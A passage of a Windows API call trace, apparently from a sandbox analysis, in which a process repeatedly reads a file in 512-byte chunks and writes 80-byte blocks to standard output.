lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.386] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.386] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.386] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.386] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.386] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.386] GetFileType (hFile=0x4c) returned 0x1 [0111.386] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.386] GetFileType (hFile=0x4c) returned 0x1 [0111.386] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.386] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.386] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.386] GetFileType (hFile=0x4c) returned 0x1 [0111.386] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.386] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.386] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.386] GetFileType (hFile=0x4c) returned 0x1 [0111.386] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.386] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.386] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.386] GetFileType (hFile=0x4c) returned 0x1 [0111.386] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.386] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.386] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.386] GetFileType (hFile=0x4c) returned 0x1 [0111.386] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.386] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.386] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.386] GetFileType (hFile=0x4c) returned 0x1 [0111.386] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.387] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.387] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.387] GetFileType (hFile=0x4c) returned 0x1 [0111.387] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.387] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.387] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.387] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.387] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.387] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.387] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.387] GetFileType (hFile=0x4c) returned 0x1 [0111.387] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.387] GetFileType (hFile=0x4c) returned 0x1 [0111.387] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.387] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.387] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.387] GetFileType (hFile=0x4c) returned 0x1 [0111.387] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.387] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.387] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.387] GetFileType (hFile=0x4c) returned 0x1 [0111.387] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.387] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.387] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.387] GetFileType (hFile=0x4c) returned 0x1 [0111.387] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.387] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.387] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.387] GetFileType (hFile=0x4c) returned 0x1 [0111.387] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.388] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.388] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.388] GetFileType (hFile=0x4c) returned 0x1 [0111.388] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.388] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.388] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.388] GetFileType (hFile=0x4c) returned 0x1 [0111.388] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.388] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.388] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.388] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.388] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.388] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.388] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.388] GetFileType (hFile=0x4c) returned 0x1 [0111.388] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.388] GetFileType (hFile=0x4c) returned 0x1 [0111.388] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.388] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.388] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.388] GetFileType (hFile=0x4c) returned 0x1 [0111.388] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.388] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.388] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.388] GetFileType (hFile=0x4c) returned 0x1 [0111.388] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.388] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.389] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.389] GetFileType (hFile=0x4c) returned 0x1 [0111.389] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.389] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.389] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.389] GetFileType (hFile=0x4c) returned 0x1 [0111.389] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.389] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.389] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.389] GetFileType (hFile=0x4c) returned 0x1 [0111.389] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.389] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.389] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.389] GetFileType (hFile=0x4c) returned 0x1 [0111.389] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.389] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.389] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.389] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.389] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.389] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.389] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.389] GetFileType (hFile=0x4c) returned 0x1 [0111.389] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.390] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.390] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.390] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.390] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.390] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.390] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.390] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.390] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.390] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.390] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.390] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.390] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.391] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.391] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.391] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.391] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.391] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.391] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.391] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.391] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.391] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.391] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.392] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.392] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.392] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.392] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.392] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.392] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.392] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.392] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.392] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.392] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.393] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.393] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.393] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.393] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.393] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.393] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.393] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.393] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.394] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.394] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.394] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.394] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.394] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.394] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.394] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.394] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.394] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.394] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.395] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.441] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.441] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.441] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.441] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.441] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.441] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.441] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.441] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, 